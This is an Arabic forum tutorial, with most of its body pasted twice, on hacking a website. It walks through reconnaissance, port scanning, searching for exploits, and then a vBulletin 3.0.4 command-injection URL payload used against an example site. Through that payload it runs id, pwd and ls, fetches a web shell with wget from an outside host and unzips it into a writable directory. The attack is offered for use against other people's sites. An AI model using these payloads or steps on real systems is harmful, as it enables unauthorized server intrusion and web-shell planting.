أقدم لكم هذا الشرح اللي كتبته بمجهودي الفردي واشكر جميع معلمي في هذا المنتدى والمنتديات الاخرى وشكر خاص موجه الى :-
الساحر-جمرقان ، metoovet
وغيرهم من الاعضاء
نبدأ على بركة الله :-
يجب أولا جمع المعلومات عن الموقع المراد اختراقه عن طريق عدة مواقع وهي :-
1 - www.netcraft.com
2- www.whois.net
3- http://whois.webhosting.info/your site
نبدا بالشرح وحدة وحدة
أولا موقع :- www.netcraft.com
تدخل الموقع يطلعلك مستطيل طويل يمتد من أول الصفحة لاخرها تكتب في اسم الموقع بدون
http://
بعدين تطلعلك عنو معلومات كثيرة ومنها تقرير عن الاموقع (site report) ونظام التشغيل (os)
والسيرفر ورقم الاي بي
ثانيا:- موقع www.whois.net
تدخل الموقع ثم تجد سطرا تكتب به اسم الموقع ثم تختار .com و .net وغيره من قائمة موجودة بجانبه
ثم تضغط go
ملاحظة لكي تميز السطر يكون مكتوبا بجانبه whois look up
ثالثا:- موقع http://whois.webhosting.info/your site
بحيث ان المقصود بـ your site هو الموقع المراد جمع المعلومات عنه
ستظهر لك معلومات مثل اسم الدومين ورقم الاي بي
ملاحظة اضغط على رقم الاي بي وسيظهر لك باقي المواقع على السير فر
وبهذا نكون انتهينا من الخطوة الأولى
---------------------------------------------------------------------------------------------------
الخطوة الثانية :- جمع ثغرات
كما ذكرنا بالخطوة الأولى جمع المعلومات فقد جمعناها لتساعدنا على اكتشاف الثغرات
وهذه طريقة سهلة لجمع الثغرات :-
الان اتفصح الموقع من منتدى معرض صور اصدار منتدى ...الخ
ثم أعمل للموقع سكان ببرامج مثل سوبر سكان أو أدفانس سكانر عشان تشوف البورتات المفوحة
أو باستخذام الأدة nmap
ثم تشوف لبرامج اللي على البورتات المفتوحة تقولي كيف
الان بقولك
روح (start) ثم (run ) ثم اكتب telnet www.site.com port
بحيث :-
telnet = الأمر
www.site.com = الموقع المراد جمع المعلومات عنه
port = هو رقم البورت المفتوح
تقولي اعطيني مثال تفضل خذ مثال
مثلا الموقع اللي تبي تخترقه اسمه
www.aliop700.com
وبعد ما عملتله سكان طلع البورتات المفتوحة هي :-
21
25
80
هس بدك تشوف البرامج اللي على البورت 25
تكتب telnet www.aliop700.com 25
مثلا طلعلك عليه برنامج
send mail 8.12
الان تدخل مواقع السيكيوريتي مثل :-
http://www.packetstormsecurity.com/
http://www.securiteam.com
وغيرها ....
إذا ما لقيت ثغرات للبرنامج عليها ادخل على سيد الهكرز (موقع القوقل)
www.google.com
واكتب في مربع البحث
exploit send mail 8.12
حتى نفس الشي بالنسبة لـ اصدار الـ vb
اذا ما لقيتله ثغرات تقدر تكتب
exploit vbulletin x.x.x
بحيث x هو رقم الإصدار
ولا تنسى تفحص كل البورتات المفتوحة
-----------------------------------------------------------------------------------------------------
الخطوة الثالثة :- رفع الشل :-
ذكرنا بالخطة السابقة جمع الثغرات وذلك لأجل رفع الشل
نقول مثلا انك تفحصت اصدار المنتدى ولقيته vbulletin 3.0.4
ورحت الـ milw0rm ودورت ولقيتله ثغرة وهي :-
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
طبعا يكون مكتوب تحتها شروط انت طبق وما عليك
اذا كان الموقع هو www.aliop700.com/vb
يصير الرابط :-
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
الان وصلنا للجزء المهم وهو تطبيق أوامر الدوس أو اللينكس
وسأشرحها :-
الان تحط عالمتصفح الرابط هذا
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
وحط Enter
راح يعطيك الصلاحيات والصلاحيات هي كالتالي :-
nobody : معنى هذه الصلاححية انه لا يمكنك أبدا رفع الشل لكن الحلو في هذه الصلاحية انك تقدر تستعرض جميع اليوزرات اللي عالسيرفر مثل الشبح ههههههههههههه
user : انت الان تطبق جميع الاوامر لكن على موقع واحد فقط اللي هو اللي رافع الشل عليه
root : انت الان مدير السيرفر بامكانك عمل كل شيء على السيرفر .........
ملاحظة يمكن يطلعلك apache وهي نفس no body
نكمل بعد ما حطيت enter طلعلك
uid=100(apache) gid=500(apache) groups=500(apache
أو
uid=100(nobody) gid=500(nobody)
حلو معنى الكلام انك nobody لحد هنا تمام ok
الن تحط مكان id تحط pwd يصير الرابط هكذا
كود PHP:
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('pwd')."
تحط enter وهذا الأمر يعرض مسارك على السيرفر
مثلا طلع انو مسارك
/home/domains/admin.com/public_html/vb
حلو الان تحط الأمر ls -la عشان تعرف الملف اللي يحمل تصريح drwxrwxrwx 777
مثلا طلعلك انو ملف اسمو hot يحمل التصريح 777 لازم تحط
cd /home/domains/admin.com/public_html/vb/hot;wget http://shell.com/shell.zip ;ls -la
بحيث cd = أمر الدخول
wget = أمر سحب الشل
ls -la = أمر استعراض التصاريح
;= هي تفصل بين الأوامر
ويصير الرابط
كود PHP:
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('cd /home/domains/admin.com/public_html/vb/hot;wget http://shell.com/shell.zip ;ls -la ')."
وتحط enter
والان تحط
الامر unzip لفك ضغط الشل
ويصير الرابط :-
كود PHP:
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('cd /home/domains/admin.com/public_html/vb/hot;unzip shell.zip;ls -la ')."
وتحط enter
مع مراعاة ان shell.zip
هو اسم الملف فاذا رفعت الملف المضغوط باسم aliop يجب ان تكتب unzip aliop.zip
وهكذا تكون رفعت الشل أكمل الموضوع بعدين
انشاء الله يكون الموضوع أعجبكم
الساحر-جمرقان ، metoovet
وغيرهم من الاعضاء
نبدأ على بركة الله :-
يجب أولا جمع المعلومات عن الموقع المراد اختراقه عن طريق عدة مواقع وهي :-
1 - www.netcraft.com
2- www.whois.net
3- http://whois.webhosting.info/your site
نبدا بالشرح وحدة وحدة
أولا موقع :- www.netcraft.com
تدخل الموقع يطلعلك مستطيل طويل يمتد من أول الصفحة لاخرها تكتب في اسم الموقع بدون
http://
بعدين تطلعلك عنو معلومات كثيرة ومنها تقرير عن الاموقع (site report) ونظام التشغيل (os)
والسيرفر ورقم الاي بي
ثانيا:- موقع www.whois.net
تدخل الموقع ثم تجد سطرا تكتب به اسم الموقع ثم تختار .com و .net وغيره من قائمة موجودة بجانبه
ثم تضغط go
ملاحظة لكي تميز السطر يكون مكتوبا بجانبه whois look up
ثالثا:- موقع http://whois.webhosting.info/your site
بحيث ان المقصود بـ your site هو الموقع المراد جمع المعلومات عنه
ستظهر لك معلومات مثل اسم الدومين ورقم الاي بي
ملاحظة اضغط على رقم الاي بي وسيظهر لك باقي المواقع على السير فر
وبهذا نكون انتهينا من الخطوة الأولى
---------------------------------------------------------------------------------------------------
الخطوة الثانية :- جمع ثغرات
كما ذكرنا بالخطوة الأولى جمع المعلومات فقد جمعناها لتساعدنا على اكتشاف الثغرات
وهذه طريقة سهلة لجمع الثغرات :-
الان اتفصح الموقع من منتدى معرض صور اصدار منتدى ...الخ
ثم أعمل للموقع سكان ببرامج مثل سوبر سكان أو أدفانس سكانر عشان تشوف البورتات المفوحة
أو باستخذام الأدة nmap
ثم تشوف لبرامج اللي على البورتات المفتوحة تقولي كيف
الان بقولك
روح (start) ثم (run ) ثم اكتب telnet www.site.com port
بحيث :-
telnet = الأمر
www.site.com = الموقع المراد جمع المعلومات عنه
port = هو رقم البورت المفتوح
تقولي اعطيني مثال تفضل خذ مثال
مثلا الموقع اللي تبي تخترقه اسمه
www.aliop700.com
وبعد ما عملتله سكان طلع البورتات المفتوحة هي :-
21
25
80
هس بدك تشوف البرامج اللي على البورت 25
تكتب telnet www.aliop700.com 25
مثلا طلعلك عليه برنامج
send mail 8.12
الان تدخل مواقع السيكيوريتي مثل :-
http://www.packetstormsecurity.com/
http://www.securiteam.com
وغيرها ....
إذا ما لقيت ثغرات للبرنامج عليها ادخل على سيد الهكرز (موقع القوقل)
www.google.com
واكتب في مربع البحث
exploit send mail 8.12
حتى نفس الشي بالنسبة لـ اصدار الـ vb
اذا ما لقيتله ثغرات تقدر تكتب
exploit vbulletin x.x.x
بحيث x هو رقم الإصدار
ولا تنسى تفحص كل البورتات المفتوحة
-----------------------------------------------------------------------------------------------------
الخطوة الثالثة :- رفع الشل :-
ذكرنا بالخطة السابقة جمع الثغرات وذلك لأجل رفع الشل
نقول مثلا انك تفحصت اصدار المنتدى ولقيته vbulletin 3.0.4
ورحت الـ milw0rm ودورت ولقيتله ثغرة وهي :-
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
طبعا يكون مكتوب تحتها شروط انت طبق وما عليك
اذا كان الموقع هو www.aliop700.com/vb
يصير الرابط :-
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
الان وصلنا للجزء المهم وهو تطبيق أوامر الدوس أو اللينكس
وسأشرحها :-
الان تحط عالمتصفح الرابط هذا
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
وحط Enter
راح يعطيك الصلاحيات والصلاحيات هي كالتالي :-
nobody : معنى هذه الصلاححية انه لا يمكنك أبدا رفع الشل لكن الحلو في هذه الصلاحية انك تقدر تستعرض جميع اليوزرات اللي عالسيرفر مثل الشبح ههههههههههههه
user : انت الان تطبق جميع الاوامر لكن على موقع واحد فقط اللي هو اللي رافع الشل عليه
root : انت الان مدير السيرفر بامكانك عمل كل شيء على السيرفر .........
ملاحظة يمكن يطلعلك apache وهي نفس no body
نكمل بعد ما حطيت enter طلعلك
uid=100(apache) gid=500(apache) groups=500(apache
أو
uid=100(nobody) gid=500(nobody)
حلو معنى الكلام انك nobody لحد هنا تمام ok
الن تحط مكان id تحط pwd يصير الرابط هكذا
كود PHP:
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('pwd')."
تحط enter وهذا الأمر يعرض مسارك على السيرفر
مثلا طلع انو مسارك
/home/domains/admin.com/public_html/vb
حلو الان تحط الأمر ls -la عشان تعرف الملف اللي يحمل تصريح drwxrwxrwx 777
مثلا طلعلك انو ملف اسمو hot يحمل التصريح 777 لازم تحط
cd /home/domains/admin.com/public_html/vb/hot;wget http://shell.com/shell.zip ;ls -la
بحيث cd = أمر الدخول
wget = أمر سحب الشل
ls -la = أمر استعراض التصاريح
;= هي تفصل بين الأوامر
ويصير الرابط
كود PHP:
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('cd /home/domains/admin.com/public_html/vb/hot;wget http://shell.com/shell.zip ;ls -la ')."
وتحط enter
والان تحط
الامر unzip لفك ضغط الشل
ويصير الرابط :-
كود PHP:
http://www.aliop700.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('cd /home/domains/admin.com/public_html/vb/hot;unzip shell.zip;ls -la ')."
وتحط enter
مع مراعاة ان shell.zip
هو اسم الملف فاذا رفعت الملف المضغوط باسم aliop يجب ان تكتب unzip aliop.zip
وهكذا تكون رفعت الشل أكمل الموضوع بعدين
انشاء الله يكون الموضوع أعجبكم